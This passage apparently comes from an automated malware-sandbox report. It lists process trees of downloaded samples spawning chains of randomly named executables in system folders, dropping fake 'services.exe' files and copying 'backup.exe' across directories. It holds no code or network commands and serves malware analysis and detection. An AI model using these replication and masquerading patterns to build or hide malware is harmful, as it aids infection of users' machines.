        PID:7704
        
        C:\Windows\SysWOW64\Mjkblhfo.exe
        
        C:\Windows\system32\Mjkblhfo.exe
        12⤵
        
        PID:5148
        
        C:\Windows\SysWOW64\Nnbnhedj.exe
        
        C:\Windows\system32\Nnbnhedj.exe
        13⤵
        
        PID:4252
        
        C:\Windows\SysWOW64\Omgcpokp.exe
        
        C:\Windows\system32\Omgcpokp.exe
        14⤵
        
        PID:8248
        
        C:\Windows\SysWOW64\Pocpfphe.exe
        
        C:\Windows\system32\Pocpfphe.exe
        15⤵
        
        PID:9024
        
        C:\Windows\SysWOW64\Coadnlnb.exe
        
        C:\Windows\system32\Coadnlnb.exe
        16⤵
        
        PID:3972
        
        C:\Windows\SysWOW64\Efjbcakl.exe
        
        C:\Windows\system32\Efjbcakl.exe
        17⤵
        
        PID:8372
        
        C:\Windows\SysWOW64\Gmdcfidg.exe
        
        C:\Windows\system32\Gmdcfidg.exe
        18⤵
        
        PID:7868
        
        C:\Windows\SysWOW64\Imgicgca.exe
        
        C:\Windows\system32\Imgicgca.exe
        19⤵
        
        PID:9792
        
        C:\Windows\SysWOW64\Mmfkhmdi.exe
        
        C:\Windows\system32\Mmfkhmdi.exe
        20⤵
        
        PID:12052
        
        C:\Windows\SysWOW64\Bddcenpi.exe
        
        C:\Windows\system32\Bddcenpi.exe
        21⤵
        
        PID:7216
- - C:\Users\Admin\Downloads\241002-xvpl2awara6ce83c4edc57adb15c1ab9cc5fae27a235c71104b6d082ad7869fec72170e0b4N.exe
    C:\Users\Admin\Downloads\241002-xvpl2awara6ce83c4edc57adb15c1ab9cc5fae27a235c71104b6d082ad7869fec72170e0b4N.exe
    3⤵
    PID:2096
  - - \??\c:\xllfxxr.exe
      c:\xllfxxr.exe
      4⤵
      PID:5672
    - - \??\c:\pjjpj.exe
        
        c:\pjjpj.exe
        5⤵
        
        PID:5064
      - \??\c:\vjvjj.exe
        
        c:\vjvjj.exe
        6⤵
        
        PID:6548
        
        \??\c:\3rxrllf.exe
        
        c:\3rxrllf.exe
        7⤵
        
        PID:5180
        
        \??\c:\dvvdv.exe
        
        c:\dvvdv.exe
        8⤵
        
        PID:4564
        
        \??\c:\ddjpj.exe
        
        c:\ddjpj.exe
        9⤵
        
        PID:7504
        
        \??\c:\hhhhtt.exe
        
        c:\hhhhtt.exe
        10⤵
        
        PID:5248
        
        \??\c:\pjvpp.exe
        
        c:\pjvpp.exe
        11⤵
        
        PID:6368
        
        \??\c:\jpvvp.exe
        
        c:\jpvvp.exe
        12⤵
        
        PID:7840
        
        \??\c:\httthb.exe
        
        c:\httthb.exe
        13⤵
        
        PID:8680
        
        \??\c:\lrrrlfx.exe
        
        c:\lrrrlfx.exe
        14⤵
        
        PID:5856
        
        \??\c:\jppjv.exe
        
        c:\jppjv.exe
        15⤵
        
        PID:3944
        
        \??\c:\1llfrlf.exe
        
        c:\1llfrlf.exe
        16⤵
        
        PID:8972
        
        \??\c:\1pppj.exe
        
        c:\1pppj.exe
        17⤵
        
        PID:7888
        
        \??\c:\thhtnh.exe
        
        c:\thhtnh.exe
        18⤵
        
        PID:9836
        
        \??\c:\5ttnhh.exe
        
        c:\5ttnhh.exe
        19⤵
        
        PID:9688
        
        \??\c:\rffxlfr.exe
        
        c:\rffxlfr.exe
        20⤵
        
        PID:7612
        
        \??\c:\3dpdp.exe
        
        c:\3dpdp.exe
        21⤵
        
        PID:13692
        
        \??\c:\7hnntt.exe
        
        c:\7hnntt.exe
        22⤵
        
        PID:5516
        
        \??\c:\nttnnb.exe
        
        c:\nttnnb.exe
        23⤵
        
        PID:15296
        
        \??\c:\tnbbbb.exe
        
        c:\tnbbbb.exe
        24⤵
        
        PID:15944
- - C:\Users\Admin\Downloads\241002-yg5a1atcjlb33878296dbfa1d30b58a54ed6aa9c3dcda5a14dc19ff74780a8329f04f94a6eN.exe
    C:\Users\Admin\Downloads\241002-yg5a1atcjlb33878296dbfa1d30b58a54ed6aa9c3dcda5a14dc19ff74780a8329f04f94a6eN.exe
    3⤵
    PID:184
  - - C:\Windows\SysWOW64\Dbcmakpl.exe
      C:\Windows\system32\Dbcmakpl.exe
      4⤵
      PID:5124
    - - C:\Windows\SysWOW64\Ebommi32.exe
        
        C:\Windows\system32\Ebommi32.exe
        5⤵
        
        PID:5704
      - C:\Windows\SysWOW64\Gjdaodja.exe
        
        C:\Windows\system32\Gjdaodja.exe
        6⤵
        
        PID:4176
        
        C:\Windows\SysWOW64\Hplicjok.exe
        
        C:\Windows\system32\Hplicjok.exe
        7⤵
        
        PID:6624
        
        C:\Windows\SysWOW64\Icfekc32.exe
        
        C:\Windows\system32\Icfekc32.exe
        8⤵
        
        PID:3512
        
        C:\Windows\SysWOW64\Jgnqgqan.exe
        
        C:\Windows\system32\Jgnqgqan.exe
        9⤵
        
        PID:2276
        
        C:\Windows\SysWOW64\Kcpahpmd.exe
        
        C:\Windows\system32\Kcpahpmd.exe
        10⤵
        
        PID:7276
        
        C:\Windows\SysWOW64\Ldipha32.exe
        
        C:\Windows\system32\Ldipha32.exe
        11⤵
        
        PID:7976
        
        C:\Windows\SysWOW64\Mkohaj32.exe
        
        C:\Windows\system32\Mkohaj32.exe
        12⤵
        
        PID:5896
        
        C:\Windows\SysWOW64\Nagpeo32.exe
        
        C:\Windows\system32\Nagpeo32.exe
        13⤵
        
        PID:7184
        
        C:\Windows\SysWOW64\Ohkkhhmh.exe
        
        C:\Windows\system32\Ohkkhhmh.exe
        14⤵
        
        PID:8124
        
        C:\Windows\SysWOW64\Phigif32.exe
        
        C:\Windows\system32\Phigif32.exe
        15⤵
        
        PID:8956
        
        C:\Windows\SysWOW64\Cleegp32.exe
        
        C:\Windows\system32\Cleegp32.exe
        16⤵
        
        PID:1068
        
        C:\Windows\SysWOW64\Fihnomjp.exe
        
        C:\Windows\system32\Fihnomjp.exe
        17⤵
        
        PID:8020
        
        C:\Windows\SysWOW64\Gmafajfi.exe
        
        C:\Windows\system32\Gmafajfi.exe
        18⤵
        
        PID:5836
        
        C:\Windows\SysWOW64\Hbjoeojc.exe
        
        C:\Windows\system32\Hbjoeojc.exe
        19⤵
        
        PID:5988
        
        C:\Windows\SysWOW64\Jgbchj32.exe
        
        C:\Windows\system32\Jgbchj32.exe
        20⤵
        
        PID:9164
- - C:\Users\Admin\Downloads\241002-yf17ysxbjffcac84ad5cf46a0f38ee1e80d056078d99888063ebfbc47d16404c44c9d66622N.exe
    C:\Users\Admin\Downloads\241002-yf17ysxbjffcac84ad5cf46a0f38ee1e80d056078d99888063ebfbc47d16404c44c9d66622N.exe
    3⤵
    PID:5004
- - C:\Users\Admin\Downloads\241002-x5vwsssfmr0c27c8a56c70e3551394a637110f095f_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-x5vwsssfmr0c27c8a56c70e3551394a637110f095f_JaffaCakes118.exe
    3⤵
    PID:2464
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2464 -s 292
      4⤵
      Program crash
      PID:7672
- - C:\Users\Admin\Downloads\241002-ygwzmatbrl0c38d13e37635a71c66d7d0437f6762b_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-ygwzmatbrl0c38d13e37635a71c66d7d0437f6762b_JaffaCakes118.exe
    3⤵
    PID:2056
  - - C:\backup.exe
      \backup.exe \
      4⤵
      PID:9136
    - - C:\PerfLogs\backup.exe
        
        C:\PerfLogs\backup.exe C:\PerfLogs\
        5⤵
        
        PID:8696
    - - C:\Program Files\backup.exe
        
        "C:\Program Files\backup.exe" C:\Program Files\
        5⤵
        
        PID:7952
      - C:\Program Files\7-Zip\backup.exe
        
        "C:\Program Files\7-Zip\backup.exe" C:\Program Files\7-Zip\
        6⤵
        
        PID:13544
- - C:\Users\Admin\Downloads\241002-ycvk1awhqe0c330be1fcf5e7e29091fba30420ae76_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-ycvk1awhqe0c330be1fcf5e7e29091fba30420ae76_JaffaCakes118.exe
    3⤵
    PID:1260
  - - C:\Users\Admin\qibef.exe
      "C:\Users\Admin\qibef.exe"
      4⤵
      PID:6872
- - C:\Users\Admin\Downloads\241002-x6tp5asfrmc4104540049181d2a2da70b7c4aef8cbd517a2565f8b532d18a0d86393afe947N.exe
    C:\Users\Admin\Downloads\241002-x6tp5asfrmc4104540049181d2a2da70b7c4aef8cbd517a2565f8b532d18a0d86393afe947N.exe
    3⤵
    PID:1308
  - - C:\Windows\services.exe
      "C:\Windows\services.exe"
      4⤵
      PID:5256
- - C:\Users\Admin\Downloads\241002-yb68eatajp857ea300da66f338b85172b3e1cb423e81f177f21e3c300f1bcf74252e9c891eN.exe
    C:\Users\Admin\Downloads\241002-yb68eatajp857ea300da66f338b85172b3e1cb423e81f177f21e3c300f1bcf74252e9c891eN.exe
    3⤵
    PID:1740
  - - \??\c:\rxxrrrl.exe
      c:\rxxrrrl.exe
      4⤵
      PID:5276
    - - \??\c:\xrxxxxr.exe
        
        c:\xrxxxxr.exe
        5⤵
        
        PID:5820
      - \??\c:\dpvdd.exe
        
        c:\dpvdd.exe
        6⤵
        
        PID:800
        
        \??\c:\tbbhbh.exe
        
        c:\tbbhbh.exe
        7⤵
        
        PID:6808
        
        \??\c:\rlllfff.exe
        
        c:\rlllfff.exe
        8⤵
        
        PID:5580
        
        \??\c:\jppjj.exe
        
        c:\jppjj.exe
        9⤵
        
        PID:5272
        
        \??\c:\tnnhbb.exe
        
        c:\tnnhbb.exe
        10⤵
        
        PID:7444
        
        \??\c:\djvpj.exe
        
        c:\djvpj.exe
        11⤵
        
        PID:8132
        
        \??\c:\tnnhbn.exe
        
        c:\tnnhbn.exe
        12⤵
        
        PID:6388
        
        \??\c:\fflrlll.exe
        
        c:\fflrlll.exe
        13⤵
        
        PID:7876
        
        \??\c:\1xlfxrl.exe
        
        c:\1xlfxrl.exe
        14⤵
        
        PID:8768
        
        \??\c:\9bhtnn.exe
        
        c:\9bhtnn.exe
        15⤵
        
        PID:5988
        
        \??\c:\9jjjd.exe
        
        c:\9jjjd.exe
        16⤵
        
        PID:6720
        
        \??\c:\dvdpj.exe
        
        c:\dvdpj.exe
        17⤵
        
        PID:9020
        
        \??\c:\vjjvv.exe
        
        c:\vjjvv.exe
        18⤵
        
        PID:9168
        
        \??\c:\9tnhbb.exe
        
        c:\9tnhbb.exe
        19⤵
        
        PID:11012
        
        \??\c:\nbtnhh.exe
        
        c:\nbtnhh.exe
        20⤵
        
        PID:7328
        
        \??\c:\rrfffxx.exe
        
        c:\rrfffxx.exe
        21⤵
        
        PID:10672
        
        \??\c:\ddjdv.exe
        
        c:\ddjdv.exe
        22⤵
        
        PID:12776
        
        \??\c:\nnhbnh.exe
        
        c:\nnhbnh.exe
        23⤵
        
        PID:5360
        
        \??\c:\pjjdd.exe
        
        c:\pjjdd.exe
        24⤵
        
        PID:7836
        
        \??\c:\rrrlxfl.exe
        
        c:\rrrlxfl.exe
        25⤵
        
        PID:15688
- - C:\Users\Admin\Downloads\241002-x49zbswerhb1025870dc8608b9ebe41471a09fc7548c82dd6b236fc40532f2d0995ec0c1a3.exe
    C:\Users\Admin\Downloads\241002-x49zbswerhb1025870dc8608b9ebe41471a09fc7548c82dd6b236fc40532f2d0995ec0c1a3.exe
    3⤵
    PID:2648
  - - \??\c:\frffrll.exe
      c:\frffrll.exe
      4⤵
      PID:5300
    - - \??\c:\vddvp.exe
        
        c:\vddvp.exe
        5⤵
        
        PID:6124
      - \??\c:\pjddp.exe
        
        c:\pjddp.exe
        6⤵
        
        PID:6344
        
        \??\c:\lxrlffx.exe
        
        c:\lxrlffx.exe
        7⤵
        
        PID:7032
        
        \??\c:\tnnhbn.exe
        
        c:\tnnhbn.exe
        8⤵
        
        PID:5900
        
        \??\c:\pjjjj.exe
        
        c:\pjjjj.exe
        9⤵
        
        PID:6444
        
        \??\c:\nnnhhh.exe
        
        c:\nnnhhh.exe
        10⤵
        
        PID:7600
        
        \??\c:\jpjdd.exe
        
        c:\jpjdd.exe
        11⤵
        
        PID:7000
        
        \??\c:\nhhbbb.exe
        
        c:\nhhbbb.exe
        12⤵
        
        PID:4752
        
        \??\c:\rflfxxx.exe
        
        c:\rflfxxx.exe
        13⤵
        
        PID:6544
        
        \??\c:\jdjdv.exe
        
        c:\jdjdv.exe
        14⤵
        
        PID:8584
        
        \??\c:\jdvpd.exe
        
        c:\jdvpd.exe
        15⤵
        
        PID:8280
        
        \??\c:\jvvjd.exe
        
        c:\jvvjd.exe
        16⤵
        
        PID:6104
        
        \??\c:\vjdvj.exe
        
        c:\vjdvj.exe
        17⤵
        
        PID:6168
        
        \??\c:\vppjd.exe
        
        c:\vppjd.exe
        18⤵
        
        PID:1772
        
        \??\c:\rlrrrxx.exe
        
        c:\rlrrrxx.exe
        19⤵
        
        PID:11620
        
        \??\c:\3xrxxff.exe
        
        c:\3xrxxff.exe
        20⤵
        
        PID:9812
        
        \??\c:\7ntnnt.exe
        
        c:\7ntnnt.exe
        21⤵
        
        PID:12740
        
        \??\c:\xflxxxx.exe
        
        c:\xflxxxx.exe
        22⤵
        
        PID:4940
        
        \??\c:\frrrrrf.exe
        
        c:\frrrrrf.exe
        23⤵
        
        PID:11812
        
        \??\c:\tbbbtt.exe
        
        c:\tbbbtt.exe
        24⤵
        
        PID:5548
        
        \??\c:\nhtnhn.exe
        
        c:\nhtnhn.exe
        25⤵
        
        PID:18036
- - C:\Users\Admin\Downloads\241002-yfwx8sxbjce8c1ad7e0ed029c6ae946c1be3cd1d37e759884f3ef1f11dc0cd7478a5b2c1ffN.exe
    C:\Users\Admin\Downloads\241002-yfwx8sxbjce8c1ad7e0ed029c6ae946c1be3cd1d37e759884f3ef1f11dc0cd7478a5b2c1ffN.exe
    3⤵
    PID:208
  - - C:\Windows\SysWOW64\Ecefqnel.exe
      C:\Windows\system32\Ecefqnel.exe
      4⤵
      PID:5348
    - - C:\Windows\SysWOW64\Fmfnpa32.exe
        
        C:\Windows\system32\Fmfnpa32.exe
        5⤵
        
        PID:5884
      - C:\Windows\SysWOW64\Gdaociml.exe
        
        C:\Windows\system32\Gdaociml.exe
        6⤵
        
        PID:6264
        
        C:\Windows\SysWOW64\Hlegnjbm.exe
        
        C:\Windows\system32\Hlegnjbm.exe
        7⤵
        
        PID:6892
        
        C:\Windows\SysWOW64\Idkkpf32.exe
        
        C:\Windows\system32\Idkkpf32.exe
        8⤵
        
        PID:5804
        
        C:\Windows\SysWOW64\Jlobkg32.exe
        
        C:\Windows\system32\Jlobkg32.exe
        9⤵
        
        PID:6320
        
        C:\Windows\SysWOW64\Kdbjhbbd.exe
        
        C:\Windows\system32\Kdbjhbbd.exe
        10⤵
        
        PID:7532
        
        C:\Windows\SysWOW64\Ljhefhha.exe
        
        C:\Windows\system32\Ljhefhha.exe
        11⤵
        
        PID:5960
        
        C:\Windows\SysWOW64\Mmpdhboj.exe
        
        C:\Windows\system32\Mmpdhboj.exe
        12⤵
        
        PID:6072
        
        C:\Windows\SysWOW64\Najmjokc.exe
        
        C:\Windows\system32\Najmjokc.exe
        13⤵
        
        PID:7524
        
        C:\Windows\SysWOW64\Omjpeo32.exe
        
        C:\Windows\system32\Omjpeo32.exe
        14⤵
        
        PID:8436
        
        C:\Windows\SysWOW64\Qmhlgmmm.exe
        
        C:\Windows\system32\Qmhlgmmm.exe
        15⤵
        
        PID:8136
        
        C:\Windows\SysWOW64\Cofnik32.exe
        
        C:\Windows\system32\Cofnik32.exe
        16⤵
        
        PID:6904
        
        C:\Windows\SysWOW64\Ekodjiol.exe
        
        C:\Windows\system32\Ekodjiol.exe
        17⤵
        
        PID:7992
        
        C:\Windows\SysWOW64\Glkmmefl.exe
        
        C:\Windows\system32\Glkmmefl.exe
        18⤵
        
        PID:6092
        
        C:\Windows\SysWOW64\Jedccfqg.exe
        
        C:\Windows\system32\Jedccfqg.exe
        19⤵
        
        PID:8608
- - C:\Users\Admin\Downloads\241002-x6ek7ssfqj7aec51b4c5403cf7a442cc6f020ac7ddd0eb4401a6e617b49dab4e7b727ff8adN.exe
    C:\Users\Admin\Downloads\241002-x6ek7ssfqj7aec51b4c5403cf7a442cc6f020ac7ddd0eb4401a6e617b49dab4e7b727ff8adN.exe
    3⤵
    PID:4516
  - - C:\Windows\SysWOW64\Ebhglj32.exe
      C:\Windows\system32\Ebhglj32.exe
      4⤵
      PID:5356
    - - C:\Windows\SysWOW64\Flinkojm.exe
        
        C:\Windows\system32\Flinkojm.exe
        5⤵
        
        PID:2772
      - C:\Windows\SysWOW64\Hmlpaoaj.exe
        
        C:\Windows\system32\Hmlpaoaj.exe
        6⤵
        
        PID:6412
        
        C:\Windows\SysWOW64\Hkicaahi.exe
        
        C:\Windows\system32\Hkicaahi.exe
        7⤵
        
        PID:7060
        
        C:\Windows\SysWOW64\Jdmgfedl.exe
        
        C:\Windows\system32\Jdmgfedl.exe
        8⤵
        
        PID:5928
        
        C:\Windows\SysWOW64\Knooej32.exe
        
        C:\Windows\system32\Knooej32.exe
        9⤵
        
        PID:6472
        
        C:\Windows\SysWOW64\Ljobpiql.exe
        
        C:\Windows\system32\Ljobpiql.exe
        10⤵
        
        PID:7628
        
        C:\Windows\SysWOW64\Lenicahg.exe
        
        C:\Windows\system32\Lenicahg.exe
        11⤵
        
        PID:7044
        
        C:\Windows\SysWOW64\Nelfeo32.exe
        
        C:\Windows\system32\Nelfeo32.exe
        12⤵
        
        PID:6240
        
        C:\Windows\SysWOW64\Olanmgig.exe
        
        C:\Windows\system32\Olanmgig.exe
        13⤵
        
        PID:7800
        
        C:\Windows\SysWOW64\Pdfehh32.exe
        
        C:\Windows\system32\Pdfehh32.exe
        14⤵
        
        PID:8620
        
        C:\Windows\SysWOW64\Cohkokgj.exe
        
        C:\Windows\system32\Cohkokgj.exe
        15⤵
        
        PID:7240
- - C:\Users\Admin\Downloads\241002-x55e8swflc0c280ffb12537bca109724ec89d1ccc6_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-x55e8swflc0c280ffb12537bca109724ec89d1ccc6_JaffaCakes118.exe
    3⤵
    PID:3500
- - C:\Users\Admin\Downloads\241002-yfy3latbnr2ee1cfcb9dd894b6d9e06daff0683654244af5eec13215d83be074029721d1e1N.exe
    C:\Users\Admin\Downloads\241002-yfy3latbnr2ee1cfcb9dd894b6d9e06daff0683654244af5eec13215d83be074029721d1e1N.exe
    3⤵
    PID:5524
  - - \??\c:\1hbbth.exe
      c:\1hbbth.exe
      4⤵
      PID:736
    - - \??\c:\ffllrlr.exe
        
        c:\ffllrlr.exe
        5⤵
        
        PID:6432
      - \??\c:\bhtnhb.exe
        
        c:\bhtnhb.exe
        6⤵
        
        PID:7080
        
        \??\c:\rxrrrxr.exe
        
        c:\rxrrrxr.exe
        7⤵
        
        PID:4332
        
        \??\c:\rfffxxr.exe
        
        c:\rfffxxr.exe
        8⤵
        
        PID:6504
        
        \??\c:\pvdvp.exe
        
        c:\pvdvp.exe
        9⤵
        
        PID:7648
        
        \??\c:\xlrlrff.exe
        
        c:\xlrlrff.exe
        10⤵
        
        PID:7076
        
        \??\c:\thhbnt.exe
        
        c:\thhbnt.exe
        11⤵
        
        PID:7268
        
        \??\c:\7pdvp.exe
        
        c:\7pdvp.exe
        12⤵
        
        PID:8268
        
        \??\c:\tntnbh.exe
        
        c:\tntnbh.exe
        13⤵
        
        PID:9080
        
        \??\c:\dppdp.exe
        
        c:\dppdp.exe
        14⤵
        
        PID:8612
        
        \??\c:\pjvpp.exe
        
        c:\pjvpp.exe
        15⤵
        
        PID:7600
        
        \??\c:\7jvjd.exe
        
        c:\7jvjd.exe
        16⤵
        
        PID:4152
        
        \??\c:\tbtnht.exe
        
        c:\tbtnht.exe
        17⤵
        
        PID:9652
        
        \??\c:\jpvvv.exe
        
        c:\jpvvv.exe
        18⤵
        
        PID:9748
        
        \??\c:\hhbnbh.exe
        
        c:\hhbnbh.exe
        19⤵
        
        PID:12708
        
        \??\c:\fxxrlrx.exe
        
        c:\fxxrlrx.exe
        20⤵
        
        PID:6688
        
        \??\c:\vpppp.exe
        
        c:\vpppp.exe
        21⤵
        
        PID:4512
        
        \??\c:\pdvdv.exe
        
        c:\pdvdv.exe
        22⤵
        
        PID:9080
        
        \??\c:\9hnhnn.exe
        
        c:\9hnhnn.exe
        23⤵
        
        PID:16620
- - C:\Users\Admin\Downloads\241002-xvlkdawaqf59c95f543cc85768851a4d2fb3049bb84a4c00658676727dabed62284994ceaaN.exe
    C:\Users\Admin\Downloads\241002-xvlkdawaqf59c95f543cc85768851a4d2fb3049bb84a4c00658676727dabed62284994ceaaN.exe
    3⤵
    PID:6036
  - - C:\Windows\SysWOW64\Gkkgpc32.exe
      C:\Windows\system32\Gkkgpc32.exe
      4⤵
      PID:6324
    - - C:\Windows\SysWOW64\Hcpojd32.exe
        
        C:\Windows\system32\Hcpojd32.exe
        5⤵
        
        PID:6984
      - C:\Windows\SysWOW64\Jncoikmp.exe
        
        C:\Windows\system32\Jncoikmp.exe
        6⤵
        
        PID:5872
        
        C:\Windows\SysWOW64\Kkpbin32.exe
        
        C:\Windows\system32\Kkpbin32.exe
        7⤵
        
        PID:6408
        
        C:\Windows\SysWOW64\Lgqfdnah.exe
        
        C:\Windows\system32\Lgqfdnah.exe
        8⤵
        
        PID:7588
        
        C:\Windows\SysWOW64\Lmgabcge.exe
        
        C:\Windows\system32\Lmgabcge.exe
        9⤵
        
        PID:6964
        
        C:\Windows\SysWOW64\Malpia32.exe
        
        C:\Windows\system32\Malpia32.exe
        10⤵
        
        PID:5828
        
        C:\Windows\SysWOW64\Oeehkn32.exe
        
        C:\Windows\system32\Oeehkn32.exe
        11⤵
        
        PID:7572
        
        C:\Windows\SysWOW64\Paelfmaf.exe
        
        C:\Windows\system32\Paelfmaf.exe
        12⤵
        
        PID:8464
        
        C:\Windows\SysWOW64\Aafemk32.exe
        
        C:\Windows\system32\Aafemk32.exe
        13⤵
        
        PID:5176
        
        C:\Windows\SysWOW64\Cbdjeg32.exe
        
        C:\Windows\system32\Cbdjeg32.exe
        14⤵
        
        PID:5344
        
        C:\Windows\SysWOW64\Ekodjiol.exe
        
        C:\Windows\system32\Ekodjiol.exe
        15⤵
        
        PID:4312
        
        C:\Windows\SysWOW64\Gfodeohd.exe
        
        C:\Windows\system32\Gfodeohd.exe
        16⤵
        
        PID:9920
        
        C:\Windows\SysWOW64\Mjjkaabc.exe
        
        C:\Windows\system32\Mjjkaabc.exe
        17⤵
        
        PID:432
        
        C:\Windows\SysWOW64\Mledmg32.exe
        
        C:\Windows\system32\Mledmg32.exe
        18⤵
        
        PID:12524
        
        C:\Windows\SysWOW64\Kbnlim32.exe
        
        C:\Windows\system32\Kbnlim32.exe
        19⤵
        
        PID:15240
- - C:\Users\Admin\Downloads\241002-xxpptascmk0c1f9a7557a9009d448eaf2915ec5168_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-xxpptascmk0c1f9a7557a9009d448eaf2915ec5168_JaffaCakes118.exe
    3⤵
    PID:4304
- - C:\Users\Admin\Downloads\241002-x5n39asfmm89d21bcf17e2175bffcb67f208ec1d6b3c229c719073febdab3c7862319a4265N.exe
    C:\Users\Admin\Downloads\241002-x5n39asfmm89d21bcf17e2175bffcb67f208ec1d6b3c229c719073febdab3c7862319a4265N.exe
    3⤵
    PID:6220
  - - C:\Windows\SysWOW64\Hmbfbn32.exe
      C:\Windows\system32\Hmbfbn32.exe
      4⤵
      PID:6864
    - - C:\Windows\SysWOW64\Ikbfgppo.exe
        
        C:\Windows\system32\Ikbfgppo.exe
        5⤵
        
        PID:5632
      - C:\Windows\SysWOW64\Jnlbojee.exe
        
        C:\Windows\system32\Jnlbojee.exe
        6⤵
        
        PID:6260
        
        C:\Windows\SysWOW64\Kjmfjj32.exe
        
        C:\Windows\system32\Kjmfjj32.exe
        7⤵
        
        PID:7472
        
        C:\Windows\SysWOW64\Lekmnajj.exe
        
        C:\Windows\system32\Lekmnajj.exe
        8⤵
        
        PID:8176
        
        C:\Windows\SysWOW64\Mmpdhboj.exe
        
        C:\Windows\system32\Mmpdhboj.exe
        9⤵
        
        PID:6052
        
        C:\Windows\SysWOW64\Nmnqjp32.exe
        
        C:\Windows\system32\Nmnqjp32.exe
        10⤵
        
        PID:7468
        
        C:\Windows\SysWOW64\Oogpjbbb.exe
        
        C:\Windows\system32\Oogpjbbb.exe
        11⤵
        
        PID:8396
        
        C:\Windows\SysWOW64\Qkipkani.exe
        
        C:\Windows\system32\Qkipkani.exe
        12⤵
        
        PID:9184
        
        C:\Windows\SysWOW64\Cleegp32.exe
        
        C:\Windows\system32\Cleegp32.exe
        13⤵
        
        PID:6120
        
        C:\Windows\SysWOW64\Eokqkh32.exe
        
        C:\Windows\system32\Eokqkh32.exe
        14⤵
        
        PID:9056
        
        C:\Windows\SysWOW64\Hmdlmg32.exe
        
        C:\Windows\system32\Hmdlmg32.exe
        15⤵
        
        PID:9612
        
        C:\Windows\SysWOW64\Jjpode32.exe
        
        C:\Windows\system32\Jjpode32.exe
        16⤵
        
        PID:7180
        
        C:\Windows\SysWOW64\Pmiikh32.exe
        
        C:\Windows\system32\Pmiikh32.exe
        17⤵
        
        PID:9848
        
        C:\Windows\SysWOW64\Mjidgkog.exe
        
        C:\Windows\system32\Mjidgkog.exe
        18⤵
        
        PID:12880
        
        C:\Windows\SysWOW64\Oifppdpd.exe
        
        C:\Windows\system32\Oifppdpd.exe
        19⤵
        
        PID:14116
        
        C:\Windows\SysWOW64\Kkpnga32.exe
        
        C:\Windows\system32\Kkpnga32.exe
        20⤵
        
        PID:12628
        
        C:\Windows\SysWOW64\Pmjhlklg.exe
        
        C:\Windows\system32\Pmjhlklg.exe
        21⤵
        
        PID:17256
        
        C:\Windows\SysWOW64\Lhogamih.exe
        
        C:\Windows\system32\Lhogamih.exe
        22⤵
        
        PID:7732
        
        C:\Windows\SysWOW64\Hohjgpmo.exe
        
        C:\Windows\system32\Hohjgpmo.exe
        23⤵
        
        PID:14240
- - C:\Users\Admin\Downloads\241002-yadvgashln0c2e8ece21649d429031c5b2f7bcfb4e_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-yadvgashln0c2e8ece21649d429031c5b2f7bcfb4e_JaffaCakes118.exe
    3⤵
    PID:6524
  - - C:\Windows\SysWOW64\explorer.exe
      explorer.exe
      4⤵
      PID:9208
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6524 -s 664
      4⤵
      Program crash
      PID:17024
- - C:\Users\Admin\Downloads\241002-x9mqzswgnc52c3fc919738b370c9035cec69c9dafbb268ebe107dea1923cfe1f715ccc92c1N.exe
    C:\Users\Admin\Downloads\241002-x9mqzswgnc52c3fc919738b370c9035cec69c9dafbb268ebe107dea1923cfe1f715ccc92c1N.exe
    3⤵
    PID:6784
  - - C:\Users\Admin\AppData\Local\Temp\services.exe
      "C:\Users\Admin\AppData\Local\Temp\services.exe"
      4⤵
      PID:5572
- - C:\Users\Admin\Downloads\241002-yc69sswhrf4b8b1df50345ca4d5bec8771c75af51cb9c18b579899da97be8a255e32375a8fN.exe
    C:\Users\Admin\Downloads\241002-yc69sswhrf4b8b1df50345ca4d5bec8771c75af51cb9c18b579899da97be8a255e32375a8fN.exe
    3⤵
    PID:7144
  - - C:\Windows\SysWOW64\Jlhljhbg.exe
      C:\Windows\system32\Jlhljhbg.exe
      4⤵
      PID:2096
    - - C:\Windows\SysWOW64\Kkeldnpi.exe
        
        C:\Windows\system32\Kkeldnpi.exe
        5⤵
        
        PID:7188
      - C:\Windows\SysWOW64\Lmbhgd32.exe
        
        C:\Windows\system32\Lmbhgd32.exe
        6⤵
        
        PID:7940
        
        C:\Windows\SysWOW64\Mjahlgpf.exe
        
        C:\Windows\system32\Mjahlgpf.exe
        7⤵
        
        PID:6020
        
        C:\Windows\SysWOW64\Neclenfo.exe
        
        C:\Windows\system32\Neclenfo.exe
        8⤵
        
        PID:7216
        
        C:\Windows\SysWOW64\Olfghg32.exe
        
        C:\Windows\system32\Olfghg32.exe
        9⤵
        
        PID:8172
        
        C:\Windows\SysWOW64\Pldcjeia.exe
        
        C:\Windows\system32\Pldcjeia.exe
        10⤵
        
        PID:8984
- - C:\Users\Admin\Downloads\241002-yd4kasxalgd949bab04212bd132bc7f55e251351d5e5ecd981791ca795988a6d6e41cf7d13N.exe
    C:\Users\Admin\Downloads\241002-yd4kasxalgd949bab04212bd132bc7f55e251351d5e5ecd981791ca795988a6d6e41cf7d13N.exe
    3⤵
    PID:5468
  - - C:\Users\Admin\viugal.exe
      "C:\Users\Admin\viugal.exe"
      4⤵
      PID:12292
- - C:\Users\Admin\Downloads\241002-x62qqssgjke159daf8ee3cf9f5b5baa2d05793eb220f3f642a1fe7a4b20ec6cde5838d6305N.exe
    C:\Users\Admin\Downloads\241002-x62qqssgjke159daf8ee3cf9f5b5baa2d05793eb220f3f642a1fe7a4b20ec6cde5838d6305N.exe
    3⤵
    PID:6012
  - - \??\c:\jjdvp.exe
      c:\jjdvp.exe
      4⤵
      PID:6652
    - - \??\c:\hbbbtt.exe
        
        c:\hbbbtt.exe
        5⤵
        
        PID:7728
      - \??\c:\3djdv.exe
        
        c:\3djdv.exe
        6⤵
        
        PID:5300
        
        \??\c:\btnnhh.exe
        
        c:\btnnhh.exe
        7⤵
        
        PID:7312
        
        \??\c:\fxlfllr.exe
        
        c:\fxlfllr.exe
        8⤵
        
        PID:8308
        
        \??\c:\7pdpv.exe
        
        c:\7pdpv.exe
        9⤵
        
        PID:9092
        
        \??\c:\lxfrlxr.exe
        
        c:\lxfrlxr.exe
        10⤵
        
        PID:9008
        
        \??\c:\ntnbbt.exe
        
        c:\ntnbbt.exe
